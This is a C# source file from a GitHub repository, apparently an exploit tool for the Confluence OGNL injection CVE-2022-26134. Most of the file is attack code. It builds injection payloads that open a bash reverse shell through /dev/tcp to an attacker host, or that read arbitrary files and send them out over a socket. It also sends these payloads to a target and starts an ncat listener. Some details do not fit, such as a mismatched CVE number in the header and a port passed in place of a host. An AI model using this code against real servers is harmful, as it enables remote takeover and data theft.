CVE-2022-26134/Program.cs at master · CatAnnaDev/CVE-2022-26134 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
// Exploit Title: Confluence Namespace OGNL Injection
// Date: June 3, 2022
// Exploit Author: Jacob Baines
// Vendor Homepage: https://www.atlassian.com/software/confluence
// Software Link: https://www.atlassian.com/software/confluence/download-archives
// Vendor Advisory: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
// Version: All LTS <= 7.13.6 and all others <= 7.18.0
// Tested on: 7.13.6 LTS / Ubuntu 20.04
// CVE : CVE-2022-26123


using System.Diagnostics;

namespace CVE_2022_26134;

internal class Program
{
    static void Main(string[] args)
    {
        Parser.Default.ParseArguments<CommandLineOptions>(args)
            .WithParsed(o => {
                if (o.rhost != null)
                    LocalVar.rhost = o.rhost;
/*                if (o.rport != null)
                    LocalVar.rport = o.rport;*/
                if (o.lhost != null)
                    LocalVar.lhost = o.lhost;
                if (o.lport != null)
                    LocalVar.lport = o.lport;
                if (o.protocol != null)
                    LocalVar.protocol = o.protocol;
                if (o.reverse != null)
                    LocalVar.reverse = o.reverse;
                if (o.fork != null)
                    LocalVar.fork = o.fork;
                if (o.nc != null)
                    LocalVar.nc = o.nc;
                if (o.read != null)
                    LocalVar.read = o.read;
            });

        Start();
    }


    static void Start()
    {
        string revers = "", read = "";

        if (LocalVar.reverse && LocalVar.read != null)
        {
            Console.WriteLine("Select only Reverse OR ReadFile not both");
            return;
        }
        else if (LocalVar.reverse)
        {
            revers = ReverseShell(LocalVar.lhost, LocalVar.lport);
            PushData(LocalVar.rhost, revers);
            if (!LocalVar.fork)
                new Thread(() => StartListenerNCat(LocalVar.lport)).Start();
        }
        else if (LocalVar.read != null)
        {
            read = ReadFile(LocalVar.lport, LocalVar.lport, LocalVar.read);
            PushData(LocalVar.rhost, read);
        }

    }

    private static void StartListenerNCat(string lport)
    {
        ProcessStartInfo pi = new ProcessStartInfo();
        Process p = new Process();
        pi.CreateNoWindow = false;
        pi.WindowStyle = ProcessWindowStyle.Normal;
        pi.FileName = "cmd.exe";
        pi.Arguments = $"/C ncat -lvnp {lport}";
        p.StartInfo = pi;
        p.Start();
    }

    private static async void PushData(string domain, string exploit)
    {
        Console.WriteLine($"https://{domain}/{exploit}");
        var result = "";
        HttpClientHandler httpClientHandler = new HttpClientHandler();
        httpClientHandler.AllowAutoRedirect = false;

        try
        {
            using (HttpClient client = new HttpClient())
            {
                HttpResponseMessage response = new HttpResponseMessage();
                response = await client.GetAsync($"https://{domain}/{exploit}");

                // dump contents of header
                //Console.WriteLine(response.Headers.ToString());

                if((int)response.StatusCode == 302)
                {
                    response.Headers.TryGetValues("X-Cmd-Response", out IEnumerable<string> XCmd);
                    Console.WriteLine(XCmd);
                }

                if (response.IsSuccessStatusCode)
                {
                    result = ((int)response.StatusCode).ToString();
                }
                else
                {
                    result = ((int)response.StatusCode).ToString();
                }
            }
        }
        catch (HttpRequestException hre)
        {
            result = "Server unreachable";
        }
    }

    static string ReverseShell(string lhost, string lport)
    {
        Console.WriteLine("[+] Generating a reverse shell payload");
        string exploit = "${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/'"+ lhost + "'/'" + lport + "' 0>&1').start())}";
        string Encoded = HttpUtility.UrlEncodeUnicode(exploit);
        return exploit;
    }

    static string ReadFile(string lhost, string lport, string FilePath)
    {
        Console.WriteLine("[+] Generating a payload to read: ' + args.read_file");
        string exploit = "${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('" + FilePath + "' )));var sock = new java.net.Socket('" + lhost + "', '" + lport + "'); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}";
        string Encoded = HttpUtility.UrlEncodeUnicode(exploit);
        return exploit;
    }
}